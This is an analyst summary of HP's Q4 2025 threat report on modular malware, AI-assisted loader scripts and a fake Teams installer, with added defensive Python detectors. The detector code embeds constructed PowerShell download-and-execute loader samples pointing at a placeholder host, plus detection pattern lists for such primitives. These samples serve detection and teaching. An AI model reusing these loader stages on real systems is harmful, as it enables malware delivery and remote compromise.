Attackers embrace AI-assisted development, modular malware kits, and trusted platforms to evade enterprise defenses
HP recently published its Wolf Security Threat Insights Report, detailing cyberattack trends tracked by the company during Q4 2025, and the results are (sadly, as always) alarming. Drawing on telemetry gathered from customer endpoints protected by HP Sure Click, the report documents a threat environment defined by increasing attacker efficiency: reusable, modular malware components; AI-assisted script development; and the systematic abuse of trusted platforms and legitimate applications to bypass detection. Four notable campaigns illustrate how these trends are playing out in practice.
Modular, Off-the-Shelf Malware Campaigns
A recurring theme across the quarter's campaigns was the use of shared, interchangeable malware components assembled from readily available building blocks. Threat actors launched multiple campaigns with different initial lures and final payloads, yet relied on an identical intermediate infection stage. Obfuscated scripts arrived as email attachments, often carrying double file extensions (for example, filename.docx.exe) so that they appeared to be Word documents; because Windows Explorer hides known extensions by default, such a file displays simply as filename.docx. Once executed, the scripts downloaded images from archive.org, a trusted public domain unlikely to be blocked by enterprise web filters, with malicious .NET code concealed inside. PowerShell then extracted the embedded loader and executed it through reflective loading, so the payload stayed in memory and never touched disk, sidestepping file-based detection.
HP's researchers found that final payloads varied by campaign. One variant delivered DarkCloud, an infostealer with Telegram-based command-and-control, while a parallel campaign targeting organizations in Latin America deployed AsyncRAT. The Latin America variant used malicious SVG files impersonating a leading Colombian bank (Bancolombia); because browsers render an SVG as a document and run any script it embeds, the files displayed convincing bank-themed pages that coaxed users into extracting a password-protected archive and running its contents. (Password protection serves the attacker twice: it looks like a security measure to the victim, and it keeps the archive's contents away from gateway scanners that cannot open it.) The key insight from these campaigns is that low-cost, reusable components allow threat actors to scale operations without significant technical investment, devoting the saved effort instead to refining social engineering lures.
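The two tells described above, a double-extension attachment name and image data with a .NET payload hidden past the end of the picture, can both be checked mechanically before anything is opened. The following is an added example written for this summary, not HP's code or tooling from the report; the image skeleton and the fake PE appended to it are constructed in the block, and the extension lists are an illustrative subset rather than a complete catalogue.

```python
import base64
import re

# Image signatures mapped to the marker that closes the format. Anything after
# that marker is not part of a well-formed image and deserves a look.
END_MARKERS = {
    b"\x89PNG\r\n\x1a\n": b"IEND\xaeB`\x82",  # PNG: IEND chunk followed by its CRC
    b"\xff\xd8\xff": b"\xff\xd9",              # JPEG: end-of-image marker
}

# Extension pairs that make "report.docx.exe" display as "report.docx" when
# Explorer hides known extensions (its default). Illustrative subset only.
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "jpg", "png"}
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "wsf", "hta", "ps1", "lnk"}

B64_RUN = re.compile(rb"[A-Za-z0-9+/=\r\n]{64,}")


def suspicious_attachment_name(name: str) -> bool:
    """True for a document-style extension immediately followed by an executable one."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    _, inner, outer = parts
    return inner in DOCUMENT_EXTS and outer in EXECUTABLE_EXTS


def trailing_data(image: bytes) -> bytes:
    """Bytes appended after the image's end marker (b'' if the format is unknown or clean).

    The last occurrence of the marker is used so that an embedded JPEG
    thumbnail's own end-of-image marker does not produce a false trailer.
    """
    for signature, end in END_MARKERS.items():
        if image.startswith(signature):
            idx = image.rfind(end)
            return image[idx + len(end):] if idx != -1 else b""
    return b""


def extract_embedded_pe(image: bytes):
    """Return a PE image hidden after the picture, raw or base64-encoded, else None."""
    trailer = trailing_data(image)
    if trailer.startswith(b"MZ"):
        return trailer
    for match in B64_RUN.finditer(trailer):
        try:
            decoded = base64.b64decode(re.sub(rb"\s", b"", match.group(0)), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if decoded.startswith(b"MZ"):
            return decoded
    return None


# Constructed samples (not real malware): a minimal PNG skeleton, and the same
# image with a fake PE appended as base64, which is where a loader would look.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"not a real executable"
CLEAN_PNG = (b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
             + b"\x00\x00\x00\x00IEND\xaeB`\x82")
STEGO_PNG = CLEAN_PNG + base64.b64encode(FAKE_PE)

if __name__ == "__main__":
    for fname in ("Invoice_Q4.docx.exe", "Invoice_Q4.docx"):
        print(fname, "->", "SUSPICIOUS" if suspicious_attachment_name(fname) else "ok")
    for label, blob in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        pe = extract_embedded_pe(blob)
        print(label, "->", "embedded PE of %d bytes" % len(pe) if pe else "no payload")
```

Run against a real download, `extract_embedded_pe(open(path, "rb").read())` gives a quick answer to "is this picture carrying something", which is the question a web proxy or sandbox should be asking about any image fetched by a script rather than by a browser. The trailer check only catches payloads appended after the image; data hidden inside pixel values needs a different test.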
“Vibe-Hacking”: AI-Assisted Script Development in the Wild
HP Wolf Security researchers also identified a pattern they describe as “vibe-hacking”: malicious scripts bearing the hallmarks of AI-assisted development, namely clean structure, verbose comments, and template-style code that operators can easily customize. In one campaign using PDF lures, victims were directed from a compromised website to a malicious download and then immediately redirected to a legitimate site (Booking.com) to create the impression of a trustworthy source. But that brief “drive-thru” visit to the malicious site was enough: the downloaded scripts ultimately deployed Formbook, an infostealer, and XWorm, a remote access trojan, giving the operators browser credentials, cookies, and system information from infected systems as well as remote access to them.
Notably, the infection chain used a JavaScript downloader followed by a heavily commented PowerShell stage with no obfuscation, structured in a way that suggests it was either purchased with built-in operator instructions or generated using a generative AI tool. A shared .NET loader and dropper appeared across multiple campaigns, pointing to a commercially distributed toolkit. The trend signals that the technical barrier to constructing functional malware chains is continuing to fall, as AI coding assistants enable threat actors with limited development experience to produce operational intermediate stages. For defenders, the absence of obfuscation is itself worth noting: detection rules tuned to spot mangled or encoded scripts will score these cleanly written stages as benign, so coverage has to rest on the behaviour they share with their obfuscated cousins, namely fetching a remote payload and executing it in memory.
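A triage routine that scores scripts on what they do rather than on how they look makes the point concrete. The block below is an added example for this summary, not code from HP or from the report; the two PowerShell samples it scores are constructed to mirror the page's description (one tidy and commented, one obfuscated), use placeholder hosts and marker strings, and are inert text here, never executed. The pattern lists are illustrative, not exhaustive.

```python
import re

# Primitives an intermediate PowerShell stage needs no matter how tidy it looks.
DOWNLOAD_PATTERNS = [r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod", r"Net\.WebClient",
                     r"DownloadString", r"DownloadData", r"DownloadFile", r"Start-BitsTransfer"]
EXEC_PATTERNS = [r"Invoke-Expression", r"\biex\b", r"Reflection\.Assembly\]::Load",
                 r"FromBase64String", r"Start-Process", r"Add-Type"]
# Classic obfuscation tells; their *absence* in a download-and-execute script is the point.
OBFUSCATION_PATTERNS = [r"`(?![ntrab0fv`'\"$])[A-Za-z]",  # backtick-split identifiers, not escape codes
                        r"\[char\]\s*\d+",                # char-code string building
                        r"-join\s*\(",                     # joined fragments
                        r"\{\d+\}[^\n]*-f\b",              # format-operator reassembly
                        r"'\s*\+\s*'"]                     # 'str'+'ing' concatenation


def _hits(patterns, text):
    return sorted(p for p in patterns if re.search(p, text, re.IGNORECASE))


def triage_powershell(script: str) -> dict:
    """Score a script on behaviour, obfuscation and comment density."""
    lines = [l for l in script.splitlines() if l.strip()]
    comments = [l for l in lines if l.strip().startswith("#")]
    ratio = len(comments) / len(lines) if lines else 0.0
    download = _hits(DOWNLOAD_PATTERNS, script)
    execute = _hits(EXEC_PATTERNS, script)
    obfuscation = _hits(OBFUSCATION_PATTERNS, script)
    return {
        "comment_ratio": round(ratio, 2),
        "download": download,
        "execute": execute,
        "obfuscation": obfuscation,
        # The profile the page describes: fetch + run, readable, heavily annotated.
        "vibe_profile": bool(download) and bool(execute) and not obfuscation and ratio >= 0.25,
    }


# Constructed sample 1: the tidy, annotated stage. Hosts and markers are placeholders.
COMMENTED_STAGE = r'''
# === Stage 2 loader ===
# Step 1: fetch the image that carries the encoded payload
$imageUrl = "https://example.invalid/cover.png"   # change this to your hosting URL
$client = New-Object System.Net.WebClient
$imageBytes = $client.DownloadData($imageUrl)
# Step 2: the payload sits between two text markers after the image data
$text = [System.Text.Encoding]::UTF8.GetString($imageBytes)
$start = $text.IndexOf("<<START>>") + 9
$end = $text.IndexOf("<<END>>")
$b64 = $text.Substring($start, $end - $start)
# Step 3: decode and load the .NET assembly in memory (nothing is written to disk)
$asm = [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($b64))
# Step 4: invoke the entry point; rename 'Run' if your build uses another method name
$asm.GetType("Loader.Main").GetMethod("Run").Invoke($null, $null)
'''

# Constructed sample 2: the same behaviour written the traditional, mangled way.
OBFUSCATED_STAGE = r'''
$x=('ht'+'tps://exa'+'mple.invalid/c.png');$c=New-Object Net.WebClient;$d=$c.DownloadString($x)
$y=[string]::join('',([char]73,[char]69,[char]88))
& ($y) ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))
'''

if __name__ == "__main__":
    for label, sample in (("commented", COMMENTED_STAGE), ("obfuscated", OBFUSCATED_STAGE)):
        print(label, triage_powershell(sample))
```

Both samples score the same on the download and execute lists; only the obfuscation list and the comment ratio separate them. A rule that fires on obfuscation alone catches the second script and waves the first through, which is exactly the gap the report's observation points at. Comment density is useful as a triage hint for analysts, not as a block/allow signal on its own, since plenty of legitimate administrative scripts are equally well commented.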
Redirection to a legitimate website to reinforce trust in the downloaded file (Source: HP)
Fake Microsoft Teams Site Delivers OysterLoader Backdoor
In Q4, malicious executables were the leading threat file type stopped by HP Sure Click, with most delivered through web downloads rather than email. One notable campaign involved attackers building a counterfeit Microsoft Teams website and driving traffic to it through search engine optimization poisoning and malvertising. Visitors who clicked to download Teams received an installer that silently bundled malicious files with the legitimate Microsoft Teams application, reducing the likelihood that users would notice anything suspicious.
The installer included a signed CapCut executable (dwr.exe) alongside a modified DLL (mpr.dll) and a file named configs.pdf, which was not a genuine PDF but a container for the malware. When the installer ran, the signed executable loaded the malicious DLL through DLL sideloading: mpr.dll is the name of a Windows system library, but because the loader searches an application's own directory before System32, the copy dropped beside dwr.exe was the one loaded, and its code ran inside the signed, trusted process. The DLL in turn opened and unpacked the contents of the fake PDF, and this two-step handoff executed the OysterLoader backdoor. OysterLoader provides persistent attacker access and is frequently observed as a precursor to ransomware deployment. The campaign illustrates how DLL sideloading, combined with signed binaries, bundled legitimate software, and disguised payload containers, can defeat both user suspicion and automated checks that treat a valid code signature on the host process as a sign of trustworthiness.
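Two of the ingredients above, a system-DLL name shipped beside an executable and a "PDF" whose bytes are not PDF, are visible from a plain directory listing of the unpacked installer. The block below is an added example for this summary, not HP's tooling; the file headers it checks are constructed from the page's description (the names match the text, the bytes are made up), and the system-DLL list is a small illustrative subset. It does not verify Authenticode signatures, which needs platform tooling.

```python
import os

# Leading bytes a file with the given extension should carry.
MAGIC = {
    ".pdf": (b"%PDF-",),
    ".exe": (b"MZ",),
    ".dll": (b"MZ",),
    ".png": (b"\x89PNG",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".zip": (b"PK\x03\x04",),
    ".msi": (b"\xd0\xcf\x11\xe0",),  # OLE compound document
}

# Illustrative subset of DLL names a process normally resolves from System32.
# Windows searches the application directory before System32 (unless the
# name is on the KnownDLLs list), so a same-named DLL beside the EXE wins.
SYSTEM_DLLS = {"mpr.dll", "version.dll", "cryptsp.dll", "dwmapi.dll",
               "uxtheme.dll", "wininet.dll", "profapi.dll", "wtsapi32.dll"}


def read_headers(directory: str, n: int = 8) -> dict:
    """Map each file name in `directory` to its first `n` bytes."""
    headers = {}
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                headers[name] = fh.read(n)
    return headers


def magic_mismatches(files: dict) -> list:
    """Names whose extension promises one format but whose bytes say otherwise."""
    bad = []
    for name, head in files.items():
        expected = MAGIC.get(os.path.splitext(name)[1].lower())
        if expected and not any(head.startswith(m) for m in expected):
            bad.append(name)
    return sorted(bad)


def sideload_candidates(files: dict) -> dict:
    """System-DLL names shipped beside executables, mapped to those executables."""
    exes = sorted(n for n in files if n.lower().endswith(".exe"))
    if not exes:
        return {}
    return {n: exes for n in sorted(files) if n.lower() in SYSTEM_DLLS}


def assess_package(files: dict) -> dict:
    mismatches = magic_mismatches(files)
    sideloads = sideload_candidates(files)
    return {"magic_mismatches": mismatches,
            "sideload_candidates": sideloads,
            "verdict": "suspicious" if (mismatches or sideloads) else "no findings"}


# Constructed listing modelled on the page's description: headers only, not real files.
TEAMS_LOOKALIKE = {
    "TeamsSetup.exe": b"MZ\x90\x00\x03\x00\x00\x00",
    "dwr.exe": b"MZ\x90\x00\x03\x00\x00\x00",
    "mpr.dll": b"MZ\x90\x00\x03\x00\x00\x00",
    "configs.pdf": b"\x8c\x11\xa0\x3f\xe2\x07\x00\x1d",  # does not start with %PDF-
    "license.pdf": b"%PDF-1.7\n",
}

if __name__ == "__main__":
    import json
    import sys
    files = read_headers(sys.argv[1]) if len(sys.argv) > 1 else TEAMS_LOOKALIKE
    print(json.dumps(assess_package(files), indent=2))
```

Pointed at an extracted installer directory (`python check.py C:\path\to\unpacked`), the script lists every container that lies about its type and every DLL that would shadow a system library for the executables next to it. A hit on either is a reason to detonate the package in isolation before it reaches a user's desktop, regardless of how the bundled EXE is signed.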
Malicious website mimicking Microsoft Teams to deliver malware (Source: HP)
Threat Landscape by the Numbers
HP Sure Click telemetry from Q4 2025 showed scripts and executables as the most prevalent malware delivery type at 38% of threats, up 8 percentage points from Q3. Archives came second at 36%, down 9 points, with ZIP, RAR, GZ, 7Z, and TAR as the most abused formats. Office documents accounted for 11% of threats (up 3 points), PDF files for 8% (down 3 points), and malicious spreadsheets for 4%.
Email remained the dominant delivery vector at 58% of threats, though this represented a 9% decline from Q3, offset by a 7-point rise in malicious web browser downloads to 23%. Notably, at least 14% of e-mail threats caught by HP Sure Click had already bypassed one or more email gateway scanners, up 3 points from the prior quarter—underscoring that gateway filtering alone is insufficient.
Keypoint Intelligence Opinion
The March 2026 HP Wolf Security Threat Insights Report reinforces a direction in which the endpoint threat landscape has been moving for some time: attackers are becoming more operationally efficient without becoming significantly more technically sophisticated. The modular toolkit model, AI-assisted scripting, and the systematic abuse of trusted services (archive.org, Google Drive, legitimately signed executables) all represent a maturation of attacker tradecraft rather than a technical breakthrough. The practical effect for defenders is that many traditional detection signals are being neutralized systematically and at low cost.
The vibe-hacking observation is particularly worth tracking. If generative AI is enabling less technically skilled operators to assemble functional infection chains, the volume and diversity of attacks may increase even as the average attacker sophistication stays flat or declines. Security teams should expect to see more campaigns with this profile: structurally coherent, well-commented, easily customizable, and ready to deploy with minimal effort.
The persistence of e-mail as the leading threat vector, combined with a worrisome 14% gateway bypass rate, underscores the need for endpoint-level isolation controls. HP Wolf Security's approach of containing threats within micro-VMs before they can reach the host OS is directly relevant to the campaign types documented here, where multi-stage chains rely on reaching the endpoint to execute. Organizations evaluating endpoint security investments should weigh isolation-based approaches alongside traditional detection tools, particularly where e-mail and web download exposure is high.